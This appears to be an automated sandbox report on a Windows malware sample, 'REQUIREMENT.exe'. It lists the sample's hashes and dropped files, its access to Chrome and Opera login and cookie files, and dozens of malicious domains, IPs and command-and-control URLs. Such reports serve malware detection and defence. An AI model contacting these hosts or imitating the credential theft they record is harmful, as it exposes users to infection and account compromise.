Source: explorer.exe, 00000009.00000000.32958790326.00000000018C0000.00000002.00020000.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.32908381925.0000000001167000.00000004.00000020.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000009.00000000.32958790326.00000000018C0000.00000002.00020000.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.32958790326.00000000018C0000.00000002.00020000.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Program Manager6f

Source: Yara match	File source: Process Memory Space: REQUIREMENT.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: systray.exe PID: 2092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: certmgr3ff.exe PID: 2676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: certmgr3ff.exe PID: 6616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: certmgr3ff.exe PID: 4776, type: MEMORYSTR

Windows Analysis Report REQUIREMENT.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
47.88.32.85	www.ceruleden.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
199.101.245.90	www.thousandoaks-buickgmc.com	United States	19366	MNSUS	true
185.73.226.109	www.mobileiranian2.com	unknown	44386	OZON-ASRU	true
156.67.72.176	alexanderorlandis.com	United States	201341	TESONETLT	true
192.64.116.180	www.high-clicks.com	United States	22612	NAMECHEAP-NETUS	true
93.184.220.29	unknown	European Union	15133	EDGECASTUS	false
172.67.139.41	www.researchlearningspirit.xyz	United States	13335	CLOUDFLARENETUS	true
172.217.168.46	drive.google.com	United States	15169	GOOGLEUS	false
75.2.115.196	www.xn--4pvw92bcry.com	United States	16509	AMAZON-02US	true
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
103.164.172.49	taichan.xyz	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
156.239.224.4	www.alo360.net	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
142.250.186.179	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
51.77.52.109	hkautobox.com	France	16276	OVHFR	true
204.141.43.204	zhs.zohosites.com	United States	2639	ZOHO-ASUS	false
91.195.240.94	www.nu12.online	Germany	47846	SEDO-ASDE	true
15.197.150.5	a402f69f12f4a8640.awsglobalaccelerator.com	United States	7430	TANDEMUS	true
3.121.211.190	www.i8news-de.website	United States	16509	AMAZON-02US	true
151.101.192.119	www.soymilk-design.com	United States	54113	FASTLYUS	true
154.215.231.81	www.cinargeridonusum.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
137.117.17.70	www.uprisehealthmonitoring.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
172.217.168.78	docs.google.com	United States	15169	GOOGLEUS	false
192.0.78.25	estudio-me.com	United States	2635	AUTOMATTICUS	true
198.59.144.16	centralcontable.net	United States	13332	HYPEENT-SJUS	true
66.96.130.148	www.fishermandm.com	United States	29873	BIZLAND-SDUS	true
172.217.168.33	unknown	United States	15169	GOOGLEUS	false
34.102.136.180	bestofnapa.guide	United States	15169	GOOGLEUS	false
198.54.117.210	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
198.54.117.211	unknown	United States	22612	NAMECHEAP-NETUS	true
199.34.228.191	www.shopsharpgraphics.com	United States	27647	WEEBLYUS	true
216.189.108.75	tpmionline.com	United States	6921	ARACHNITECUS	true
154.195.206.5	www.bqgfk.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true

Name	Malicious	Antivirus Detection	Reputation
http://www.high-clicks.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.xn--4pvw92bcry.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.tpmionline.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.cinargeridonusum.com/cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.jkwhitleyphotography.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2	true	Avira URL Cloud: safe	unknown
http://www.domainair.biz/cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.cacaolixir.com/cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC	false	Avira URL Cloud: safe	unknown
https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download	false		high
https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download&nonce=r167qul5841hi&user=04225796272126474013Z&hash=htm37s8j60l12inv0q761u8k5rdo7ceb	false		high
http://www.estudio-me.com/cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.shopsharpgraphics.com/cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.tpmionline.com/cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.taichan.xyz/cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP	true	Avira URL Cloud: safe	unknown
http://www.boliden-ab.com/cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP	true	Avira URL Cloud: safe	unknown
http://www.uprisehealthmonitoring.com/cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.marvellouslles.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F	true	Avira URL Cloud: safe	unknown
http://www.shopsharpgraphics.com/cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.nu12.online/cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.xn--4pvw92bcry.com/cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP	true	Avira URL Cloud: safe	unknown
https://docs.google.com/nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e%3Ddownload&hash=ne1ffd4kaaa27pue6e32mldfstfdqasf	false		high
http://www.ceruleden.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr	true	Avira URL Cloud: safe	unknown
http://www.hkautobox.com/cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.cinargeridonusum.com/cogu/	true	Avira URL Cloud: safe	unknown
www.tpmionline.com/cogu/	true	Avira URL Cloud: safe	low
http://www.cacaolixir.com/cogu/	false	Avira URL Cloud: safe	unknown
http://www.shopsharpgraphics.com/cogu/	true	Avira URL Cloud: safe	unknown
https://doc-04-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra59sspsgplogf893q75230rnc/1634132775000/18281895610876391208/*/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download	false		high
http://www.nazfoodstuff.com/cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.nu12.online/cogu/	true	Avira URL Cloud: safe	unknown
http://www.soymilk-design.com/cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.bqgfk.com/cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.domainair.biz/cogu/	true	Avira URL Cloud: safe	unknown
http://www.high-clicks.com/cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.researchlearningspirit.xyz/cogu/	true	Avira URL Cloud: safe	unknown
http://www.fishermandm.com/cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.fishermandm.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.xn--4pvw92bcry.com/cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.nazfoodstuff.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.alo360.net/cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.alexanderorlandis.com/cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.bestofnapa.guide/cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC	false	Avira URL Cloud: safe	unknown
http://www.jachaljuega.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ	false	Avira URL Cloud: safe	unknown
http://www.i8news-de.website/cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown

ID:	1641
Product:	CloudBasic
Start time:	15:44:39
Start date:	13.10.2021
Sample:	REQUIREMENT.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	fb70ff484021669624233d0fbd77ec6a
SHA1:	6820b13631967663ec2637c43c828468633051fd
SHA256:	2b40757a6763aa725d86426ce3cd16fcf1380a9152837d4fbe5e5b085710054c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.15%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\Aidr0p8lx\certmgr3ff.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FB70FF484021669624233D0FBD77EC6A	6820B13631967663EC2637C43C828468633051FD	2B40757A6763AA725D86426CE3CD16FCF1380A9152837D4FBE5E5B085710054C
C:\Users\user\AppData\Local\Temp\DB1	SQLite 3.x database, last written using SQLite version 3035005	3486408AF6E5BFDBE15DEDDEFB834576	8118E27D74977C176BD305862105CE5F22AE10D8	5B26EE9B1FF774148D102BD7594D4B31C4B004D05C42F72EF82B1C90362B2196
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms	Composite Document File V2 Document, Cannot read section info	3E816923BA81E5D113C621EEFCB70865	1165F3E591D7CA9897E0FA80A7B844FA1EC04BD5	6C79FF6FD49A2EF5A0955EE4BD31D3FCD69D609CAD733355751045E84E55FF9B